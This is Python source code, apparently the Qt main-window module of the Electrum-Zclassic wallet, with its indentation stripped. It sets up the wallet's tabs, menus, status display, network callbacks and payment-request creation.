import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_zclassic import keystore, simple_config
from electrum_zclassic.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_zclassic import constants
from electrum_zclassic.plugins import run_hook
from electrum_zclassic.i18n import _
from electrum_zclassic.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword)
from electrum_zclassic import Transaction
from electrum_zclassic import util, bitcoin, commands, coinchooser
from electrum_zclassic import paymentrequest
from electrum_zclassic.wallet import Multisig_Wallet, AddTransactionException
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_zclassic.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self._old_excepthook = None
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros', 8))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-zclassic.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
        # Once the GUI has been initialized, check whether we want to announce
        # something, since the callback may already have fired before the GUI was initialized.
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-Zclassic Testnet" if constants.net.TESTNET else "Electrum-Zclassic"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Zclassic coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Zclassic coins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum-Zclassic was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # Settings / Preferences are reserved keywords on macOS; using this as a workaround
tools_menu.addAction(_("Electrum-Zclassic preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
#help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://github.com/ZClassicCommunity/electrum-zclassic"))
help_menu.addSeparator()
#help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://github.com/ZClassicCommunity/electrum-zclassic")).setShortcut(QKeySequence.HelpContents)
#self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
#self._auto_crash_reports.setChecked(self.config.get("show_crash_reporter", default=False))
#self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
#help_menu.addAction(self._auto_crash_reports)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key("show_crash_reporter", state)
self.setup_exception_hook()
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('zclassic:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-Zclassic",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum-Zclassic focus is speed, with low resource usage and simplifying ZClassic. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the ZClassic system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/ZClassicCommunity/electrum-zclassic/issues\">https://github.com/ZClassicCommunity/electrum-zclassic/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum-Zclassic (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-Zclassic - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
                # Iterate over a copy: removing entries from the list being iterated would skip transactions.
                for tx in list(self.tx_notifications):
                    if tx:
                        self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-Zclassic", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-Zclassic", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return '%s sat/kB' % round(fee_rate)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'uZCL'
if self.decimal_point == 5:
return 'mZCL'
if self.decimal_point == 8:
return 'ZCL'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
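        # Keep a coin-denominated amount edit and its fiat counterpart in sync; the
        # 'follows' flag prevents the two textChanged handlers from re-triggering each other.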
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zclassic address where the payment should be received. Note that each payment request uses a different Zclassic address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zclassic addresses.'),
_('The Zclassic address never expires and will always be part of this electrum-zclassic wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
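        # If an OpenAlias is configured and it resolves to one of our own addresses,
        # sign the request with that address (this may prompt for the wallet password).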
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
        expiration = expiration_values[i][1]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
